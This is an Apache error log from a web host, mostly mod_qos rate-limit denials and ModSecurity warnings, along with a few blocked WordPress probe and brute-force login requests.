[Tue May 26 20:00:31.384763 2026] [security2:error] [pid 106517:tid 106727] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhYZZc2DoU1lPnP1hHQAAANE"]
[Tue May 26 20:00:31.401847 2026] [security2:error] [pid 93576:tid 93765] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhmDRMqfxdEDkoswEswAAADU"]
[Tue May 26 20:00:31.406766 2026] [security2:error] [pid 106517:tid 106684] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhoZZc2DoU1lPnP1hZgAAAKY"]
[Tue May 26 20:00:31.421828 2026] [security2:error] [pid 106517:tid 106715] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhoZZc2DoU1lPnP1hZQAAAMU"]
[Tue May 26 20:00:31.421851 2026] [security2:error] [pid 93576:tid 93726] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhmDRMqfxdEDkoswEtQAAAA4"]
[Tue May 26 20:00:31.423072 2026] [security2:error] [pid 93576:tid 93777] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhmDRMqfxdEDkoswEuAAAAEE"]
[Tue May 26 20:00:31.425857 2026] [security2:error] [pid 93576:tid 93739] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhmDRMqfxdEDkoswEtwAAABs"]
[Tue May 26 20:00:31.431912 2026] [security2:error] [pid 93576:tid 93803] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhmDRMqfxdEDkoswEsAAAAFs"]
[Tue May 26 20:00:31.438893 2026] [security2:error] [pid 93576:tid 93795] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhmDRMqfxdEDkoswEtgAAAFM"]
[Tue May 26 20:00:31.439858 2026] [security2:error] [pid 106517:tid 106768] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhoZZc2DoU1lPnP1haQAAAPo"]
[Tue May 26 20:00:31.498820 2026] [security2:error] [pid 93576:tid 93790] [client 103.163.220.40:50191] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/themes/fukasawa/inc/classes/403x.php"] [unique_id "ahWuh2DRMqfxdEDkoswFJwAAAE4"]
[Tue May 26 20:00:31.586884 2026] [qos:error] [pid 106517:tid 106677] [client 45.148.10.120:46646] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuh4ZZc2DoU1lPnP1h5gAAAKA
[Tue May 26 20:00:31.588639 2026] [qos:error] [pid 93576:tid 93814] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuh2DRMqfxdEDkoswFPAAAAGY
[Tue May 26 20:00:31.588644 2026] [qos:error] [pid 93576:tid 93713] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWuh2DRMqfxdEDkoswFPQAAAAE
[Tue May 26 20:00:31.589150 2026] [qos:error] [pid 93576:tid 93772] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuh2DRMqfxdEDkoswFPwAAADw
[Tue May 26 20:00:31.590527 2026] [qos:error] [pid 93576:tid 93793] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuh2DRMqfxdEDkoswFQQAAAFE
[Tue May 26 20:00:31.593559 2026] [qos:error] [pid 93576:tid 93803] [client 45.148.10.120:46668] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuh2DRMqfxdEDkoswFQwAAAFs
[Tue May 26 20:00:31.594161 2026] [qos:error] [pid 93576:tid 93739] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuh2DRMqfxdEDkoswFRAAAABs
[Tue May 26 20:00:31.594653 2026] [qos:error] [pid 93576:tid 93799] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuh2DRMqfxdEDkoswFRQAAAFc
[Tue May 26 20:00:31.664249 2026] [security2:error] [pid 106517:tid 106524] [remote 222.165.190.235:44294] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.190.165.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWuh4ZZc2DoU1lPnP1h6QAAqQQ"], referer: https://yourstorybag.com/wp-login.php
[Tue May 26 20:00:31.739482 2026] [qos:error] [pid 93576:tid 93753] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuh2DRMqfxdEDkoswFTgAAACk
[Tue May 26 20:00:31.740244 2026] [qos:error] [pid 93576:tid 93814] [client 45.148.10.120:53542] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuh2DRMqfxdEDkoswFTwAAAGY
[Tue May 26 20:00:31.741669 2026] [qos:error] [pid 106517:tid 106761] [client 45.148.10.120:46732] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuh4ZZc2DoU1lPnP1h6wAAAPM
[Tue May 26 20:00:31.742341 2026] [qos:error] [pid 106517:tid 106761] [client 45.148.10.120:46724] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuh4ZZc2DoU1lPnP1h7AAAAPM
[Tue May 26 20:00:31.745036 2026] [qos:error] [pid 93576:tid 93726] [client 45.148.10.120:46668] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuh2DRMqfxdEDkoswFUAAAAA4
[Tue May 26 20:00:31.745125 2026] [qos:error] [pid 106517:tid 106733] [client 45.148.10.120:58044] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuh4ZZc2DoU1lPnP1h7QAAANc
[Tue May 26 20:00:31.751085 2026] [qos:error] [pid 106517:tid 106672] [client 45.148.10.120:58028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuh4ZZc2DoU1lPnP1h7wAAAJs
[Tue May 26 20:00:31.757613 2026] [qos:error] [pid 106517:tid 106727] [client 45.148.10.120:46646] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuh4ZZc2DoU1lPnP1h8AAAANE
[Tue May 26 20:00:31.891071 2026] [qos:error] [pid 93576:tid 93791] [client 45.148.10.120:53542] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuh2DRMqfxdEDkoswFVgAAAE8
[Tue May 26 20:00:31.893875 2026] [qos:error] [pid 106517:tid 106774] [client 45.148.10.120:46732] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuh4ZZc2DoU1lPnP1h8wAAAQA
[Tue May 26 20:00:31.895216 2026] [qos:error] [pid 106517:tid 106772] [client 45.148.10.120:46724] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuh4ZZc2DoU1lPnP1h9AAAAP4
[Tue May 26 20:00:31.895268 2026] [qos:error] [pid 106517:tid 106684] [client 45.148.10.120:58044] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWuh4ZZc2DoU1lPnP1h9QAAAKY
[Tue May 26 20:00:31.896362 2026] [qos:error] [pid 93576:tid 93794] [client 45.148.10.120:53558] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuh2DRMqfxdEDkoswFWAAAAFI
[Tue May 26 20:00:31.896885 2026] [qos:error] [pid 93576:tid 93806] [client 45.148.10.120:46668] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuh2DRMqfxdEDkoswFWQAAAF4
[Tue May 26 20:00:31.902904 2026] [qos:error] [pid 93576:tid 93713] [client 45.148.10.120:53566] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuh2DRMqfxdEDkoswFWwAAAAE
[Tue May 26 20:00:31.904484 2026] [qos:error] [pid 106517:tid 106728] [client 45.148.10.120:58028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuh4ZZc2DoU1lPnP1h9gAAANI
[Tue May 26 20:00:31.907474 2026] [qos:error] [pid 106517:tid 106749] [client 45.148.10.120:46646] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuh4ZZc2DoU1lPnP1h9wAAAOc
[Tue May 26 20:00:32.058842 2026] [security2:error] [pid 93576:tid 93722] [client 103.163.220.39:59283] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/uploads/2025/"] [unique_id "ahWuiGDRMqfxdEDkoswFYwAAAAo"]
[Tue May 26 20:00:32.208531 2026] [qos:error] [pid 93576:tid 93749] [client 45.148.10.120:53574] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuiGDRMqfxdEDkoswFZgAAACU
[Tue May 26 20:00:32.288688 2026] [security2:error] [pid 93576:tid 93836] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhmDRMqfxdEDkoswEuwAAAHw"]
[Tue May 26 20:00:32.292109 2026] [security2:error] [pid 106517:tid 106679] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhoZZc2DoU1lPnP1hawAAAKE"]
[Tue May 26 20:00:32.294063 2026] [security2:error] [pid 93576:tid 93759] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhmDRMqfxdEDkoswEvgAAAC8"]
[Tue May 26 20:00:32.298610 2026] [security2:error] [pid 106517:tid 106671] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhoZZc2DoU1lPnP1hcAAAAJo"]
[Tue May 26 20:00:32.300756 2026] [security2:error] [pid 93576:tid 93778] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhmDRMqfxdEDkoswEuQAAAEI"]
[Tue May 26 20:00:32.303228 2026] [security2:error] [pid 106517:tid 106664] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhoZZc2DoU1lPnP1hhAAAAJM"]
[Tue May 26 20:00:32.308287 2026] [security2:error] [pid 106517:tid 106690] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhoZZc2DoU1lPnP1hbQAAAKw"]
[Tue May 26 20:00:32.310320 2026] [security2:error] [pid 106517:tid 106662] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhoZZc2DoU1lPnP1hhQAAAJE"]
[Tue May 26 20:00:32.325277 2026] [security2:error] [pid 93576:tid 93819] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhmDRMqfxdEDkoswEwQAAAGs"]
[Tue May 26 20:00:32.326046 2026] [security2:error] [pid 106517:tid 106758] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhoZZc2DoU1lPnP1hiAAAAPA"]
[Tue May 26 20:00:32.330458 2026] [security2:error] [pid 93576:tid 93738] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuh2DRMqfxdEDkoswFAAAAABo"]
[Tue May 26 20:00:32.336902 2026] [security2:error] [pid 106517:tid 106723] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuh4ZZc2DoU1lPnP1huAAAAM0"]
[Tue May 26 20:00:32.342667 2026] [security2:error] [pid 106517:tid 106680] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhoZZc2DoU1lPnP1hgQAAAKI"]
[Tue May 26 20:00:32.345460 2026] [security2:error] [pid 93576:tid 93748] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhmDRMqfxdEDkoswEwgAAACQ"]
[Tue May 26 20:00:32.347082 2026] [security2:error] [pid 93576:tid 93798] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuh2DRMqfxdEDkoswFAQAAAFY"]
[Tue May 26 20:00:32.347803 2026] [security2:error] [pid 93576:tid 93796] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhmDRMqfxdEDkoswE0wAAAFQ"]
[Tue May 26 20:00:32.348739 2026] [security2:error] [pid 93576:tid 93808] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhmDRMqfxdEDkoswE0AAAAGA"]
[Tue May 26 20:00:32.372884 2026] [security2:error] [pid 93576:tid 93763] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuh2DRMqfxdEDkoswFCAAAADM"]
[Tue May 26 20:00:32.375666 2026] [security2:error] [pid 93576:tid 93767] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuh2DRMqfxdEDkoswFDQAAADc"]
[Tue May 26 20:00:32.378142 2026] [security2:error] [pid 106517:tid 106712] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuh4ZZc2DoU1lPnP1htQAAAMI"]
[Tue May 26 20:00:32.384248 2026] [security2:error] [pid 106517:tid 106775] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuh4ZZc2DoU1lPnP1hvQAAAQE"]
[Tue May 26 20:00:32.384692 2026] [security2:error] [pid 106517:tid 106759] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhoZZc2DoU1lPnP1hhwAAAPE"]
[Tue May 26 20:00:32.388338 2026] [security2:error] [pid 93576:tid 93742] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhmDRMqfxdEDkoswEywAAAB4"]
[Tue May 26 20:00:32.392438 2026] [security2:error] [pid 93576:tid 93723] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuh2DRMqfxdEDkoswFEgAAAAs"]
[Tue May 26 20:00:32.396238 2026] [security2:error] [pid 106517:tid 106659] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuh4ZZc2DoU1lPnP1htgAAAI4"]
[Tue May 26 20:00:32.400436 2026] [security2:error] [pid 93576:tid 93724] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuh2DRMqfxdEDkoswFCgAAAAw"]
[Tue May 26 20:00:32.429571 2026] [security2:error] [pid 106517:tid 106683] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuh4ZZc2DoU1lPnP1hxAAAAKU"]
[Tue May 26 20:00:32.431490 2026] [security2:error] [pid 93576:tid 93743] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuh2DRMqfxdEDkoswFIQAAAB8"]
[Tue May 26 20:00:32.434230 2026] [security2:error] [pid 93576:tid 93762] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuh2DRMqfxdEDkoswFHAAAADI"]
[Tue May 26 20:00:32.437835 2026] [security2:error] [pid 106517:tid 106778] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuh4ZZc2DoU1lPnP1h0wAAAQQ"]
[Tue May 26 20:00:32.438958 2026] [security2:error] [pid 93576:tid 93740] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuh2DRMqfxdEDkoswFFgAAABw"]
[Tue May 26 20:00:32.565726 2026] [security2:error] [pid 106517:tid 106662] [client 103.163.220.30:37985] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/edit.php"] [unique_id "ahWuiIZZc2DoU1lPnP1iEwAAAJE"]
[Tue May 26 20:00:32.890571 2026] [qos:error] [pid 93576:tid 93790] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuiGDRMqfxdEDkoswFoAAAAE4
[Tue May 26 20:00:32.890780 2026] [qos:error] [pid 106517:tid 106676] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuiIZZc2DoU1lPnP1iSgAAAJ8
[Tue May 26 20:00:32.892471 2026] [qos:error] [pid 93576:tid 93774] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuiGDRMqfxdEDkoswFrQAAAD4
[Tue May 26 20:00:32.892842 2026] [qos:error] [pid 93576:tid 93714] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuiGDRMqfxdEDkoswFrwAAAAI
[Tue May 26 20:00:32.893244 2026] [qos:error] [pid 93576:tid 93728] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuiGDRMqfxdEDkoswFsgAAABA
[Tue May 26 20:00:32.894789 2026] [qos:error] [pid 93576:tid 93750] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuiGDRMqfxdEDkoswFsQAAACY
[Tue May 26 20:00:32.895885 2026] [qos:error] [pid 93576:tid 93839] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuiGDRMqfxdEDkoswFtQAAAH8
[Tue May 26 20:00:32.896006 2026] [qos:error] [pid 93576:tid 93829] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuiGDRMqfxdEDkoswFtgAAAHU
[Tue May 26 20:00:32.901574 2026] [qos:error] [pid 93576:tid 93816] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuiGDRMqfxdEDkoswFuAAAAGg
[Tue May 26 20:00:33.039783 2026] [qos:error] [pid 106517:tid 106708] [client 45.148.10.120:55348] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuiYZZc2DoU1lPnP1iVwAAAL4
[Tue May 26 20:00:33.041418 2026] [qos:error] [pid 93576:tid 93836] [client 45.148.10.120:35336] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuiWDRMqfxdEDkoswFvQAAAHw
[Tue May 26 20:00:33.046901 2026] [qos:error] [pid 106517:tid 106731] [client 45.148.10.120:57912] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuiYZZc2DoU1lPnP1iWgAAANU
[Tue May 26 20:00:33.047245 2026] [qos:error] [pid 106517:tid 106732] [client 45.148.10.120:58056] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuiYZZc2DoU1lPnP1iWwAAANY
[Tue May 26 20:00:33.049268 2026] [qos:error] [pid 93576:tid 93714] [client 45.148.10.120:53552] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuiWDRMqfxdEDkoswFvgAAAAI
[Tue May 26 20:00:33.049426 2026] [qos:error] [pid 93576:tid 93735] [client 45.148.10.120:46670] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuiWDRMqfxdEDkoswFvwAAABc
